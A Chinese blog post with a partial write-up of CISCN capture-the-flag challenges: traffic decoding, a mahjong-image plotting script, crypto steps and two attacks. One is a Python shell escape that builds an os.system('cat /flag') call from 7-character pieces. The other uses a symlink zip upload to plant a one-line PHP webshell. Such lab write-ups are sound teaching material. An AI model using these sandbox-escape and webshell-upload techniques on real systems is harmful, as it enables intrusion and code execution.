CISCN国赛--wp

最新推荐文章于 2024-04-12 05:29:08 发布
最新推荐文章于 2024-04-12 05:29:08 发布
阅读量759 收藏
点赞数 1
文章标签: python 学习 学习方法 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qing_chuan_/article/details/130976504
版权
文章介绍了CISCN国赛中的几个挑战,包括使用Wireshark进行TCP流量分析解密flag,通过Python脚本解决麻将图片谜题,以及利用Python命令行绕过限制获取flag。此外,还涉及了基于国密SM2的密钥分发和Linux软链接与zip命令在Web安全中的应用。
摘要由CSDN通过智能技术生成

CISCN国赛–wp(一部分)

第一次参加国赛,我一个小菜鸡,真的纯纯是坐牢

misc部分

签到卡

按顺序打印出print(open(‘/flag’).read())

被加密的生产流量

用wireshark打开流量包,追踪tcp流

在tcp流第0流里发现base编码
请添加图片描述

一行行里面的字母拼起来MMYWMX3GNEYWOXZRGAYDA===

这几去base32解码即可得到flag

c1f_fi1g_1000

国粹

这题看的嘎嘎眼花

给了3张图片,有一张图片有两排麻将,另外两张图片也是麻将,不过是分开的,不会做,赛后看了佬们的wp,需要将合起来的图片挨个排号

跟据 题目.png这个图片,从左到右按个编号1-42

a.png 作为x轴,k.png作为y轴

然后那个一条是(0,0)点

附脚本

import matplotlib.pyplot as plt
x_coords = [1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4,
            5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7,
            7, 7, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 9, 9, 9, 9, 9, 9, 10, 10, 12, 12, 12, 12, 13, 13, 13, 13, 13,
            13, 13, 13, 13, 13, 13, 13, 13, 13, 14, 14, 14, 14, 14, 14, 14, 14, 15, 15, 15, 15, 15, 15, 15, 16, 16, 16,
            16, 16, 16, 16, 16, 17, 17, 17, 17, 17, 17, 17, 17, 18, 18, 18, 18, 18, 19, 19, 19, 19, 19, 19, 19, 19, 19,
            19, 19, 19, 19, 19, 19, 19, 19, 20, 20, 22, 22, 22, 22, 22, 22, 22, 22, 22, 22, 22, 22, 23, 23, 23, 23, 23,
            23, 23, 23, 23, 23, 23, 23, 23, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 25, 25, 25, 25, 25, 25, 25, 25, 25,
            25, 25, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 28, 28, 28, 28,
            28, 28, 28, 28, 28, 28, 28, 28, 28, 29, 29, 29, 29, 29, 31, 31, 31, 31, 31, 31, 32, 32, 32, 32, 32, 32, 32,
            32, 32, 32, 32, 32, 32, 32, 32, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 34, 34, 34, 34, 34, 34, 34, 34,
            34, 35, 35, 35, 35, 35, 35, 35, 35, 35, 35, 35, 36, 36, 36, 36, 36, 36, 36, 37, 37, 37, 37, 37, 37, 37, 37,
            37, 38, 38, 38, 38, 38, 38, 38, 38, 38, 38, 38, 38, 38, 38, 38, 38, 38, 39, 39, 39]
y_coords = [4, 5, 10, 30, 3, 4, 5, 6, 10, 29, 30, 3, 4, 10, 16, 17, 22, 23, 24, 25, 29, 30, 2, 3, 4, 5, 10, 15, 16, 18,
            21, 22, 24, 25, 29, 30, 3, 4, 10, 15, 17, 18, 19, 20, 22, 25, 28, 29, 3, 4, 10, 15, 16, 18, 19, 21, 22, 25,
            29, 3, 4, 10, 11, 12, 13, 15, 18, 19, 22, 23, 24, 25, 29, 30, 3, 4, 11, 12, 15, 16, 17, 18, 19, 20, 25, 29,
            30, 21, 22, 24, 25, 30, 31, 23, 24, 22, 23, 24, 25, 2, 3, 4, 5, 9, 10, 11, 12, 13, 16, 17, 18, 19, 24, 25,
            2, 5, 6, 9, 12, 19, 23, 24, 5, 9, 12, 18, 19, 22, 23, 4, 5, 9, 12, 17, 18, 23, 23, 24, 3, 4, 9, 12, 16, 17,
            24, 25, 3, 9, 12, 16, 25, 3, 4, 5, 6, 9, 10, 11, 12, 16, 17, 18, 19, 21, 22, 23, 24, 25, 10, 11, 3, 4, 5, 6,
            10, 11, 12, 17, 18, 19, 24, 25, 3, 6, 7, 9, 10, 16, 17, 19, 20, 22, 23, 24, 25, 3, 6, 7, 9, 10, 16, 19, 20,
            24, 25, 3, 6, 7, 10, 11, 12, 16, 19, 20, 20, 24, 25, 3, 6, 7, 12, 13, 16, 19, 20, 24, 25, 3, 6, 7, 9, 12,
            13, 16, 19, 20, 24, 25, 3, 4, 6, 9, 10, 11, 12, 16, 17, 19, 20, 24, 25, 4, 5, 17, 18, 19, 10, 11, 12, 13,
            25, 31, 4, 5, 6, 10, 11, 12, 13, 17, 18, 19, 23, 24, 25, 26, 32, 3, 4, 6, 7, 12, 16, 17, 23, 23, 24, 26, 32,
            6, 7, 11, 16, 17, 23, 24, 26, 32, 6, 11, 12, 17, 18, 19, 23, 24, 25, 26, 33, 5, 12, 13, 4, 5, 13, 16, 19, 20,
            25, 26, 32, 4, 5, 6, 7, 9, 10, 11, 12, 13, 16, 17, 18, 19, 24, 25, 31, 32, 23, 24, 31]

print(len(x_coords))
print(len(y_coords))
plt.scatter(x_coords, y_coords)
plt.title("Scatter Plot")
plt.xlabel("X-axis")
plt.ylabel("Y-axis")
plt.show()

在这里插入图片描述

puzzle

哈哈,无语死,2880张图片要我拼图,等后续更新

pyshell

这是一个python的命令窗口

但是限制了输入长度

以可以通过_+”__”获取一个字符串变量 可以不断拼接绕过7个字符的限制

依次输入’__imp’和 _+‘ort’ 将字符串 拼接成

依次输入以下命令拿到flag

'__imp'
_+'ort'
_+'__('
_+"'os"
_+"')."
_+"sys"
_+"tem"
_+"('c"
_+"at "
_+"/fl"
_+"ag'"
_+")"
eval(_)

密码部分

基于国密SM2算法的密钥密文分发

上传名字,学校拿到 id

上传公钥

然后访问/api/quantum接口获取密文

查看新信息,直接访问/api/search接口 上传 quantumStringServer 的内容即可

可信度量

直接grep搜索一下:

grep -r "flag{" /

末尾得到搜索到的文件结果,直接cat即可得到Flag。

Sign_in_passwd

j2rXjx8yjd=YRZWyTIuwRdbyQdbqR3R9iZmsScutj2iqj3/tidj1jd=D
GHI3KLMNJOPQRSTUb%3DcdefghijklmnopWXYZ%2F12%2B406789VaqrstuvwxyzABCDEF5
URL解码:GHI3KLMNJOPQRSTUb=cdefghijklmnopWXYZ/12+406789VaqrstuvwxyzABCDEF5
第一行放input,第二行url解码后是65位的,看大佬wp说是base64码表解码得到flag

在这里插入图片描述

web部分

unzip

这个题目要用到软连接

ln -s /var/www/html b//创建一个软连接文件shell
zip -y 1.zip b//压缩b到1.zip    

    ln -s /var/www/html shell:创建了一个名为 shell 的符号链接,该链接指向 /var/www/html 目录。符号链接是一种特殊类型的文件,可以提供对另一个文件或目录的引用。
    zip -y 1.zip shell/:将 shell 目录及其所有内容压缩成一个名为 1.zip 的 ZIP 文件。-y 选项用于在不提示的情况下覆盖现有的 ZIP 文件。

以上命令是数据,要用Linux系统操作

软连接将通过zip命令将软连接打包为1.zip上传到靶机,靶机自动解压到tmp目录下。

找到linux系统下链接的目录压缩包,将它上传,这个时候后端已经有你创建的目录了,

然后创建一个同名的文件夹压缩包

然后将一句话木马写到php中,这个时候将一句话木马上传

压缩包内容如下

请添加图片描述

Q1ng_chuan
关注
2022 CISCN 初赛pwn完整wp
weixin_46483787的博客
06-09 2252
2022 CISCN 初赛pwn的完整wp
2021第十四届全国大学生信息安全竞赛WPCISCN)-- pwn部分
热门推荐
lifanxin的博客
05-17 1万+
CISCN_2021_WP概述ciscn_2021_lonelywolf总结 概述   作为学习不到一年的练习生,今年第一次参加国赛,本以为题目会比较温柔,但是最后只做出了一道pwn题,本来还有两道pwn题是有机会的,但还是缺少一些知识或者技巧吧,没做出来,然后就结束了。本次国赛pwn题出了一道arm 64位结构的,其余都是正常的linux下pwn题,使用libc-2.27.so,有一道考了沙箱机制。 ciscn_2021_lonelywolf   ciscn_2021_lonelywolf   libc-
2023 ciscn国赛pwn lojin wp
cainiao78777的博客
05-29 2447
第一次参加国赛,被队友带飞了,pwn只做出来了四个,1381分,第16名,总体来说还可以在所有题目中,也是拿到了pwn题login的一血话说回来,来详细说一下,这个pwn题的解法首先就是能看到这是个没附件的pwn题说明只能通过交互去得到信息,再寻找方向,连接之后应该就是这四个选项。
2020ciscn wp
qq_52342676的博客
05-30 970
第十五届全国大学生信息安全竞赛创新实践能力赛
2022 CISCN 创新能力实践赛初赛WP
Love&Share
05-31 2177
WP来自齐鲁师范学院网络安全社团 文章目录MISCez_usbeverlasting_nightbabydiskWEBEzpoponline_crtPWNlogin-nomalCRY基于挑战码的双向认证1基于挑战码的双向认证2基于挑战码的双向认证2签到电台ISO9798 MISC ez_usb 文件-导出特定分组 tshark -r 2.8.1.pcapng -T fields -e usb.capdat > 2.8.1.txt ​ import os,sys ​ normalKeys = {.
第14届(2021)CISCN初赛WP(2)——Glass
InterplanetaryW的博客
06-15 389
Glass Writeup 首先使用apktool将“glass.apk”文件反编译 结果如下,提取其中Classes.dex文件 利用dex2jar工具进行反编译得到jar文件 生成jar包 使用jd-gui打开jar包,看到源码 核心判断函数如图所示 可以发现判断是利用checkFlag()函数 checkFlag为native外部函数 使用ida打开提取出的libnative-lib.so动态链接库 分析结束后可以在函数列表中很容易找到checkFlag()函数 使用F5进行反编译
国赛ciscn2024-WP-re6-gdb-debug(伪随机数保护)
最新发布
05-21
国赛ciscn2024-WP-re6-gdb_debug(伪随机数保护)
国赛ciscn2024-WP-re2-androidso-re(unidbg模拟执行Native层方法)
05-21
国赛ciscn2024-WP-re2-androidso_re(unidbg模拟执行Native层方法)
国赛ciscn2024-WP-re4-whereThel1b(动态调试Cpython的so文件)
05-21
国赛ciscn2024-WP-re4-whereThel1b(动态调试Cpython的so文件)
[2024CISCN]国赛初赛WEB题目复现_2024国赛初赛unzip题目复现
m0_74918915的博客
04-12 1730
其中返回机器的硬件地址(MAC地址),而返回特定于平台的唯一ID。4.: 将所有上述信息串联并进行哈希,得到一个SHA1哈希值。这里,函数将公开信息和私有信息合并为一个序列,然后这个序列中的每一项都被加入到哈希中。添加了一个额外的“salt”值,以确保最终的哈希值是独特的。5.将哈希值转换为16进制的字符串形式,并从中取出前20个字符。然后,它前面添加了"__wzd"前缀来生成最终的。再通过查找关键字,找到set_cookie方法
CISCN WP ——R3vCr4ck
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
05-28 1004
"flag": "已完成考题,结果正确:flag{deaf73a5-7d79-44c0-b83e-d4f9a114ca86}"分析题目,发现修改程序后的测试程序位于容器内,使用winscp通过scp连接容器,观察分析文件,尝试直接寻找flag文件。Php编写程序,把木马压到zip里面上传,直接上传一句话木马无效,尝试在压缩包里藏一个软链接把文件勾出来,多次尝试后得到。的思路溢出覆盖程序后下两位地址,保证高位地址不发生变化,避免去爆破高位地址。打开之后发现是文件上传,任意传一个文件,
2022CISCN初赛 WP
Lum1n0us's Blog
05-29 1271
文章目录Crypto签到电台 Crypto 签到电台 在公众号找到提示 在“标准电码表”找“弼时安全到达了”所对应的7个电码,再跟“密码本”的前7*4个数字分别逐位进行“模十算法”(加不进位、减不借位),所得到的就是要发送的电码。 发送电码前先发送“s”启动,即按3个“.”,这个发送电报的过程可以使用抓包软件进行抓取,可方便输入电报。 “弼时安全到达了”所对应的7个电码: 1732 2514 1344 0356 0451 6671 0055 模十算法示例:1732与6378得到7000 发包示例:/sen
2022 CISCN全国初赛-wp
qq_45603443的博客
05-30 2005
2022 CISCN全国初赛-wpWebEzpoponline_crtMiscez_usbCrypto签到基于挑战码的双向认证基于挑战码的双向认证2基于挑战码的双向认证3Pwnpwn1重点来了 Web Ezpop <?php namespace think{ abstract class Model{ private $lazySave = false; private $data = []; private $exists = false; protected $table; private $wi
2022第十五届全国大学生信息安全竞赛(ciscn)西南赛区部分WP
Bnessy
07-09 3774
访问题目flag是假的,F12源代码,看到base64解码解码得到flag访问题目,有个aid.php直接访问不行,使用PHP为协议进行读取,input2需要等于Welcone!,这里要使用data协议编码一下,input3可以随便输入 exp: base64解码得到的flag.php得到flag打开题目测试发现是Smarty的模板注入上网搜索发现Smarty模板注入CVE找到一个SmartyCVE集合,https://www.cvedetails.com/vulnerability-list/ve
CISCN部分WP
qq_51425032的博客
05-17 1034
(1)easy_sql 打开环境,是一个登录界面,因为直接告诉了是sql注入,那么就先测试注入点是哪个 然后可以测试出注入点为psswd 用bp抓包老样子然后保存在本地 sqlmap扫库 sqlmap -r 2.txt --dbs 跑到数据名为:security 然后跑表, sqlmap -r 2.txt -D security -tables 发现有两张表user和`flag,没办法继续按常用的方法进行解题,因此表名无法直接爆出来,但是可以进行猜测表明然后根据无列名...
第十六届全国大学生信息安全竞赛 ——创新实践能力赛线上初赛------WP
m0_75178803的博客
06-05 1058
通过测试和题目名称得知存在python沙盒逃逸并且一次只能输入7个字符串,使用+进行拼接调用eval函数成功执行命令。用wireshark打开modbus.pcap文件,追踪TCP流。个字符(A-Z,2-7)组成,末尾可能会有‘=’,但最多有6。进行base32解密即可得到flag值。NSSCTF的CISCN的赛后环境。base32加密特征:密文由。逐条输入指令得到flag。【1】被加密的生产流量。
CISCN 2020 线上初赛 电脑被黑 WP
h1nt的博客
08-21 768
文件下载下来是ext linux磁盘文件,挂载上去后可以得到四个文件 在demo中使用IDA可以看到加密过程,核心代码为 推测为加密后将加密的flag删除了,我们只需要恢复加密后的flag并用逆向还原即可 故我们使用工具extundelete将数据恢复,命令为: extundelete disk_dump --restore-all 可以恢复被删除的加密flag 之后编写脚本解密即可 if name == “main”: with open(r"C:\Users\shinelon\Downloads\
2020国赛部分re -- wp
Air_cat的博客
08-21 689
re1: idapy 扒校验数组: from __future__ import print_function#支持py2使用py3的函数 from __future__ import print_function#支持py2使用py3的函数 sea = 0x404020 for i in range(sea,sea+0xa8,4): print('0x%x'%(Byte(i+1)),end="") print(('%x'%Byte(i)+','),end="") 注意部分元素补0 from z
2023华中赛区ciscn部分wp
qq_42557115的博客
06-29 2539
今年ciscn华中的CTF还行,基本上都肝出来了,拿了个前十,但是awd拿了个倒一....综合一下拿了个第三,可恶,错失国防科技大学参观机会()把CTF的wp写一下,供大家参考。赛题不分上下午场了。
虹润牌19--HR-WP-HZ单屏工频周波表技术手册
"19--HR-WP-HZ单屏系列工频周波表,虹润技术资料" 19--HR-WP-HZ单屏系列工频周波表是由虹润公司推出的智能仪表,专用于交流电工显示和控制。这款仪表具有全面的功能和高效的省配线解决方案,适用于各种工业环境中的...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Q1ng_chuan

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值